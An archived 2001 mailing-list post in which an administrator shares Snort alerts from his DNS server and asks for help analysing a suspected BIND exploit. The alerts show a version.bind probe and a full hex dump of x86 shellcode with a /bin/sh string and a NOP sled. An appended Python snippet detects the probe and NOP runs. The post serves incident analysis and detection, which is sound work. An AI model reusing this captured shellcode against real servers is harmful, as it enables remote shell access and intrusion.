Security Incidents: Named TSIG exploit ?

From: Mihai Moldovanu <mihaim_at_PROFM.RO>
Date: Mon, 5 Feb 2001 20:19:40 +0200

I found this in the SNORT logs:

[**] IDS278 - SCAN -named Version probe [**]
02/01-09:30:18.672782 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x48
141.85.31.233:1024 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
Len: 38
00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72 .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03 sion.bind.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF
Len: 520
00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83 ................
C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80 ..=....|........
00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53 ....SIGNATURE.RS
41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00 A...4^........f.
00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89 .....F..F0.F.1..
46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00 F .F..F$.f......
00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00 ...N............
00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45 .............5.E
03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00 ................
00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73 ..._....../bin/s
68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05 h...7^j.j.j.jf..
61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50 a.......j...P1.P
68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D h$....F.PRh.....
05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF ................
FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62 ....5.E......./b
69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90 in/sh...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The shellcode inside the second packet is pretty strange. Can anyone
take a deeper look at it?

Lead programmer,
Mihai Moldovanu (mihaim_at_profm.ro)
WEB: http://tfm.profm.ro/
             http://www.developers.ro/
Received on Feb 05 2001
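
Added example, not part of the original post and not Snort's own rule logic: the Python below decodes the 30-byte payload of the first alert, which is a CHAOS-class TXT query for version.bind, and measures the longest run of 0x90 bytes in a payload, the pattern the second alert is named for. The function and constant names are assumptions made for this example.

```python
import struct

# UDP payload of the first alert (IDS278), bytes copied from the dump above.
VERSION_PROBE = bytes.fromhex(
    "000601000001000000000000"              # DNS header
    "0776657273696f6e0462696e640000100003"  # question section
)
QTYPE_TXT, QCLASS_CHAOS = 16, 3

def parse_dns_question(payload):
    """Decode the DNS header and the first question of a UDP payload."""
    if len(payload) < 12:
        raise ValueError("shorter than a DNS header")
    ident, flags, qd, _an, _ns, ar = struct.unpack("!6H", payload[:12])
    labels, pos = [], 12
    while True:
        if pos >= len(payload):
            raise ValueError("truncated QNAME")
        length = payload[pos]
        pos += 1
        if length == 0:          # root label ends the name
            break
        if length > 63 or pos + length > len(payload):
            raise ValueError("bad label length")
        labels.append(payload[pos:pos + length].decode("ascii", "replace").lower())
        pos += length
    if pos + 4 > len(payload):
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!2H", payload[pos:pos + 4])
    return {"id": ident, "is_response": bool(flags & 0x8000), "qdcount": qd,
            "arcount": ar, "qname": ".".join(labels), "qtype": qtype, "qclass": qclass}

def is_version_probe(payload):
    """True for a CHAOS-class TXT query for version.bind."""
    try:
        q = parse_dns_question(payload)
    except ValueError:
        return False
    return (q["qname"], q["qtype"], q["qclass"]) == ("version.bind", QTYPE_TXT, QCLASS_CHAOS)

def longest_nop_run(payload):
    """Length of the longest run of consecutive 0x90 bytes."""
    best = run = 0
    for byte in payload:
        run = run + 1 if byte == 0x90 else 0
        best = max(best, run)
    return best
```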
